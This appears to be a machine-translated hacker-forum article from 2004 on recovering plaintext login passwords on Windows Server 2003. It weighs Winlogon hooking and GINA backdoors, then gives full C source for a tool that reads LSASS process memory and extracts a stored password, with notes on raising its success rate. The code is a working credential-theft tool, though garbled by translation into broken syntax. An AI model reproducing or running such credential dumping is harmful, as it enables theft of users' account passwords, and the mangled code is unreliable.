How to get the login password in win 2003 _windows2003

In all NT systems, there are several ways to get the password of the login user. I know three ways to achieve the goal.

1.hook Winlogon several functions, online also has this type of program, called Winlogonhijack Project in Rootkit.com has provided, but that project only for local landing users valid, remote landing user is invalid.

2. Using Gina and Winlogon for a socket, the password can be recorded, high stability, and valid for both local and remote landings, as long as the code that executes its own record password for some functions, but the existing Gina backdoor is not exported in XP or 2003. This is mainly because XP and 2003 have added new functions to Winlogon.

3. Directly read the memory data to get the plaintext password. In NT 4.0/2K, there is already a program Findpass can read directly to the memory data in the Winlogon process and get the login user password directly, Because in NT4.0 and 2K, account information, including domain name, account number and password are regularly in Winlogon memory specific address, so can be very simple to get. But in the XP and 2003 system, this method is ineffective, it seems that we do not have the means to read directly the clear address. Let's talk about how, like Findpass, in NT 4.0 and 2K, you get the password of the login user in Server 2003.

Although XP and 2003 are not the same as the previous NT system to save the login user information in the Winlogon process memory address, but the base LSASS process to process some information, need to get the plaintext password, so the login user's password will appear in the LSASS process ( Microsoft did not encrypt the password in the LSASS process, Microsoft's argument is because LSASS need to get plaintext password, even if the password encryption, also can only use reversible method encryption, as long as tracking LSASS operation, as can get plaintext password, so Microsoft used a more lazy method, may also be to speed up the response, so the plaintext password is placed in the LSASS process memory. Speaking of this, we all know that the login user's password is in the memory of the LSASS process. Yes, that's the thing, but is it as easy to get this plaintext password as it is with the Findpass under NT 4.0 and 2K? In fact it is not so easy because of the following reasons:

A. The memory address of the password stored in the LSASS process is irregular

B. The password is likely to be covered by the last user (for example, the administrator ABC logs from the local, then the admin BBB is logged in remotely, then the admin BBB cancels the terminal, the password stored in the Lsass.exe process memory, or the password of the Administrator BBB), or the user logs in and then log off So if we get the password, we don't know which user's password.

C. The data before and after the password is also not regular, if there is a rule, such as the data before the password, must be a paragraph is all 01 characters of data section, then locate the password is simple.

Reason A and C all bring us the difficulty of locating the password, the original B brings the problem that cannot determine the password and account number. It seems that Microsoft has done a bit of work on the new system. But we will not give up, even if it is to take a chance, also see can get the password, anyway, even if the failure, it does not matter.

The final code, which I wrote to test if I could get the user's password in 2003 of the system, was exactly the same as the analysis above (of course, the results were measured with this program). The success rate is certainly not high, because of too many reasons, the difficulty of locating passwords or being unable to locate them, or getting information that is not a password, and so on, makes the failure rate very high, but it is always a way, or someone in the future can accurately locate, that is pleasing. Although the failure rate is high, but in one case, the success rate is very high, that is, the administrator is only in the local or terminal landing, and then no user from the local or terminal landing, and the administrator has not locked the system, then the success rate will be quite high.

two ways to improve success rates:

1. The program is written directly to the service, regularly check local or remote landing (in fact, no difference), when the detection of landing, to search LSASS process memory, try to get the password.

2. The program simulates a login (use LogonUser () can be done), because using LogonUser () The API, you have to provide the account name and the corresponding correct password, you can succeed, then you can go to search LSASS process memory. Knowing what the password is, we can locate where the password is stored. Because the user's password is kept in the same address or not far away from the address, analog landing and search, you can first locate the user's password will be stored in approximately where.

In any case, the three methods are the most stable, The safest way to do that is to use Gina. Hijack Winlogn Some API method, after all, is changed the system of things, for the stability of the system, will have the test, direct search LSASS process memory method, although it is difficult, but accuracy, success rate is low.

The following code uses a very stupid and primitive search method, primarily to search for the "LocalSystem Remote Procedure" string in LSASS memory, because in quite a bit of testing, passwords are stored in a location that has the address of this string, and of course, Many systems do not have this string, or, if so, we get the wrong password.

Code://********************************************************************************
version:v1.0
Coder:wineggdrop
Date release:12/15/2004
Purpose:to demonstrate searching Logon User Password on 2003 Box,the method
Used is pretty unwise,but that the only Way to Review the
Logon User ' s Password on Windows 2003.
Test Platform:windows 2003
Compiled on:vc++ 6.0
//********************************************************************************
#include
#include
#include

#define BASEADDRESS 0x002b5000//The Base Memory address to Search; The Password May is located before the address Or Far the other from this address,which causes the result unreliable

char Password[max_path] =; Store the Found Password

Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL Findpassword (DWORD PID);
int Search (char *buffer,const UINT nsize);
DWORD Getlsasspid ();
BOOL Is2003 ();
//------------------------------------------------------------------------------------------------------
End of Fucntion ProtoType declaration

int main ()
{
DWORD PID = 0;
printf ("Windows 2003 Password Viewer V1.0 by wineggdrop\n\n");

if (! IS2003 ())//Check out If the Box is 2003
{
printf ("The program Can ' t be Run on Windows 2003 platform\n");
return-1;
}

PID = Getlsasspid (); Get the Lsass.exe PID

if (PID = = 0)//Fail to get PID If returning Zerom
{
return-1;
}

Findpassword (PID); Find the Password from Lsass.exe Memory
return 0;
}
End Main ()

//------------------------------------------------------------------------------------
Purpose:search the Memory & Try to get the Password
Return Type:int
Parameters:
In:char *buffer--> The Memory Buffer to Search
Out:const UINT nsize--> The Size of the Memory Buffer
Note:the program tries to Locate the Magic String "LocalSystem Remote Procedure",
Since The Password is Near the Above location,but It's not Always True
We'll find the Magic string,or even we find it,the Password could be located
At Some the place.we only look for Luck
//------------------------------------------------------------------------------------
int Search (char *buffer,const UINT nsize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0;
UINT Count = 0;
if (Buffer = NULL)
{
return-1;
}
for (i = 0; i < nsize; i++)
{
/* The Below is to find the Magic string,why so complicated? That would Thank MS. The separation from Word to Word
Is isn't separated with a space,but with a ending character,so the any Search APIs like Strstr () would Fail to Locate
The Magic string,we Have to do It manually and slowly
*/
if (Buffer = = ' L ')
{
OffSet = 0;
if (strnicmp (&buffer[i + OffSet], "LocalSystem", strlen ("LocalSystem")) = = 0)
{
OffSet + + strlen ("LocalSystem") + 1;
if (strnicmp (&buffer[i + OffSet), "remote", strlen ("remote")) = = 0)
{
OffSet + + strlen ("Remote") + 1;
if (strnicmp (&buffer[i + OffSet], "Procedure", strlen ("Procedure")) = = 0)
{
OffSet + + strlen ("Procedure") + 1;
if (strnicmp (&buffer[i + OffSet], "call", strlen ("call")) = = 0)
{
i + = OffSet;
Break
}
}
}
}
}
}

If (i < nsize)
{
ZeroMemory (password,sizeof (Password));
for (; i < nsize; i++)
{
if (Buffer = = 0x02 && buffer[i + 1] = = 0 && buffer[i + 2] = = 0 &A mp;& Buffer[i + 3] = 0 && buffer[i + 4] = = 0 && buffer[i + 5] = 0 && buffer[i + 6] = = 0
{
/* The Below Code is to Retrieve the password.since of the String is in Unicode format,so We does It in
that Wa Y
/*
J = i + 7;
for (; J < Nsize; j + 2)
{
if (Buffer[j] > 0)
{
password[count++] = buffer[j];
}
Else
{
break;
}
}
return i + 7;//One Flag to indicate We find the Password
}
}
}
return-1;//Well,we Fai L to find the Password,and this Always happens
}
//End Search

//------------------------------------------------------------------------------------
Purpose:to Get the Lsass.exe PID
Return Type:dword
Parameters:none
//------------------------------------------------------------------------------------
DWORD Getlsasspid ()
{
HANDLE Hprocesssnap;
HANDLE hprocess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;

Hprocesssnap = CreateToolhelp32Snapshot (th32cs_snapprocess, 0);
if (Hprocesssnap = = INVALID_HANDLE_VALUE)
{
printf ("Fail to Create Snap shot\n");
return 0;
}

pe32.dwsize = sizeof (PROCESSENTRY32);

if (! Process32First (Hprocesssnap, &pe32))
{
CloseHandle (HPROCESSSNAP); Must clean up the snapshot object!
return 0;
}

Todo
{
if (Strcmpi (Pe32.szexefile, "Lsass.EXE") = = 0)
{
PID = Pe32.th32processid;
Break
}
}while (Process32Next (Hprocesssnap, &pe32));

CloseHandle (HPROCESSSNAP);
return PID;
}
End Getlsasspid ()

//------------------------------------------------------------------------------------
Purpose:to Find the Password
Return Type:boolean
Parameters:
In:dword pid-> The Lsass.exe ' s PID
//------------------------------------------------------------------------------------
BOOL Findpassword (DWORD PID)
{
HANDLE hprocess = NULL;
Char buffer[5 * 1024] =;
DWORD byteget = 0;
int Found =-1;

hprocess = OpenProcess (process_vm_read,false,pid); Open Process
if (hprocess = NULL)
{
printf ("Fail to Open process\n");
return FALSE;
}

if (! ReadProcessMemory (hprocess, (pvoid) baseaddress,buffer,5 * 1024,&byteget))//Read the Memory from Lsass.exe
{
printf ("Fail to Read memory\n");
CloseHandle (hprocess);
return FALSE;
}

CloseHandle (hprocess);

Found = Search (buffer,byteget); Search the Password
if (Found >= 0)//We'll find the Password
{
if (strlen (Password) > 0)//yes,we Find the Password even We Don ' t Know If the Password are correct Or not
{
printf ("Found Password at #0x%x-> \"%s\ "\ n", Found + Baseaddress,password);
}
}
Else
{
printf ("Fail to find" password\n);
}
return TRUE;
}
End Findpassword

//------------------------------------------------------------------------------------
Purpose:check If The Box is Windows 2003
Return Type:boolean
Parameters:none
//------------------------------------------------------------------------------------
BOOL Is2003 ()
{
Osversioninfoex OSVI;
BOOL B0sversioninfoex;
ZeroMemory (&osvi,sizeof (OSVERSIONINFOEX));
Osvi.dwosversioninfosize=sizeof (OSVERSIONINFOEX);

if (!) ( B0sversioninfoex=getversionex ((OSVERSIONINFO *) &OSVI))
{
Osvi.dwosversioninfosize=sizeof (OSVERSIONINFO);
}
return (osvi.dwMajorVersion = = 5 && osvi.dwminorversion = 2);
}
End Is2003 ()
End of File

The attachment program is the same as the password locator, used to test the search for a specified string or to simulate a login password in LSASS memory.

Usage:

The 1.locator string-> searches for the specified "string" in LSASS process memory, returning the determined location

2.Locator username Password-> in the system set up a parameter specified user, and simulate login, and then search "password" in the LSASS process memory location, the generated account program will automatically delete after running.